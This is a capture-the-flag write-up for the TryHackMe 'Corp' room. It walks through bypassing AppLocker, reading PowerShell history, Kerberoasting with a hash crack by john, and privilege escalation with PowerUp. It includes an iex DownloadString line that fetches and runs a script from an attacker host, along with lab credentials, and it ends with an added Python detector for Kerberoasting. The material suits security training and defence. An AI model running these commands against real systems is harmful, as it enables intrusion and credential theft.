Corp (THM)

TryHackMe Corp Write-Up

topics: Antivirus Evasion, Windows forensics, Kerberoasting, bypassing AppLocker, Windows Privilege Escalation

  1. Plan

  2. Enumeration

  3. Bypassing Applocker

  4. Kerberoasting

  5. Administrator Privilege Escalation

new tools: Invoke-Kerberoast, Invoke-AllChecks, PowerUp.ps1

tools: nmapAutomator, powershell, cmd, iex, wget

Plan

We are tasked with exploiting the box using the following methods.

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic

We are given credentials to RDP into the machine; however, it is always proper to run an nmap scan first to properly visualize all means of potential entry. Perhaps there are quality Active Directory exploitation techniques we can practice with later.

Using the credentials dark:_QuejVudId6 to RDP into the machine, our access is extremely limited. We can only open Explorer and files; every other icon or button is disabled for our user. In order to open cmd or PowerShell, we must navigate to its actual file location, C:\Windows\system32\cmd.exe

Bypassing Applocker

AppLocker's default rules allow executables to run from several locations for any user. This guide is a good start. For the sake of this room, the executable path for the user dark is C:\Windows\System32\spool\drivers\color

The room suggests that the flag could be in the PowerShell command history, which, as on most operating systems, is stored in a file. We can use the command Get-Content -Path 'C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt' to view the contents from PowerShell, or simply navigate to it in Explorer: C:\Users\Dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Kerberoasting

We can use the command setspn -T medin -Q */* to view users and see who has an existing service principal name (SPN); we can also view the users from C:\Users. We must be working in the executable directory C:\Windows\System32\spool\drivers\color in order to run commands.

We can use a tool called Invoke-Kerberoast.ps1 to get password hashes for the vulnerable SPN account. Download it from GitHub to the attacking machine, start a Python web server, and fetch it from the attacker:

iex (New-Object Net.WebClient).DownloadString('https://<attackerIP>/Invoke-Kerberoast.ps1')

Run the command Invoke-Kerberoast -OutputFormat hashcat | fl

$krb5tgs$23$*fela$corp.local$HTTPfela

The type of hash we have is displayed at the beginning: krb5tgs. We can use john to crack the password; copy the hash and store it in a file.

john --format=krb5tgs --wordlist=rockyou.txt hash

Using the credentials fela:rubenF124 we can log in via RDP.
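As an added, defender-side example (not part of the room write-up), this Python script flags the pattern that the Invoke-Kerberoast step above leaves in a domain controller's Security log: one account requesting RC4-encrypted (etype 23, the `23` in `$krb5tgs$23$`) service tickets for many distinct SPN accounts within a short window. The event 4769 records are constructed here in a simplified key=value form; a real deployment would map the same fields (TargetUserName, ServiceName, TicketEncryptionType) out of EVTX/XML.

```python
"""Spot Kerberoasting-style ticket requests in constructed Windows event 4769 records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data): one requester pulls RC4 tickets for
# three service accounts in two seconds, while other activity is ordinary AES traffic.
SAMPLE_4769 = [
    "2024-05-01T10:00:01 TargetUserName=dark@CORP.LOCAL ServiceName=fela TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "2024-05-01T10:00:01 TargetUserName=dark@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "2024-05-01T10:00:02 TargetUserName=dark@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "2024-05-01T10:00:02 TargetUserName=dark@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "2024-05-01T10:05:00 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.10.14.9",
    "2024-05-01T10:06:00 TargetUserName=WS01$@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x17 IpAddress=10.10.14.9",
]


def parse_4769(line):
    """Parse one '<iso-timestamp> key=value ...' record into a dict with a parsed time and etype."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["timestamp"] = datetime.fromisoformat(ts)
    rec["etype"] = int(rec["TicketEncryptionType"], 16)  # 0x17 = 23 = RC4-HMAC
    return rec


def find_kerberoasting(lines, min_services=3, window=timedelta(minutes=5)):
    """Return {requester: sorted service names} for any requester that obtained RC4 service
    tickets for at least `min_services` distinct user-account SPNs inside `window`.
    krbtgt and machine accounts (names ending in $) are skipped: their keys are long and
    random, so tickets for them are not offline-crackable the way the hash above is."""
    by_user = defaultdict(list)
    for rec in (parse_4769(line) for line in lines):
        svc = rec["ServiceName"]
        if rec["etype"] != 23 or svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_user[rec["TargetUserName"]].append((rec["timestamp"], svc))
    hits = {}
    for user, events in by_user.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # sliding window from each request
            services = {svc for ts, svc in events[i:] if ts - start <= window}
            if len(services) >= min_services:
                hits[user] = sorted(services)
                break
    return hits


if __name__ == "__main__":
    for user, services in find_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: RC4 tickets for {', '.join(services)}")
```

Tuning note: a single RC4 ticket request is not by itself suspicious (legacy services still use it); the signal is the burst of RC4 requests across many SPN accounts, which is exactly what requesting a ticket for every SPN at once produces.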

Administrator Privilege Escalation

Run the PowerUp.ps1 script the room suggests and call Invoke-AllChecks.

Log in with RDP.
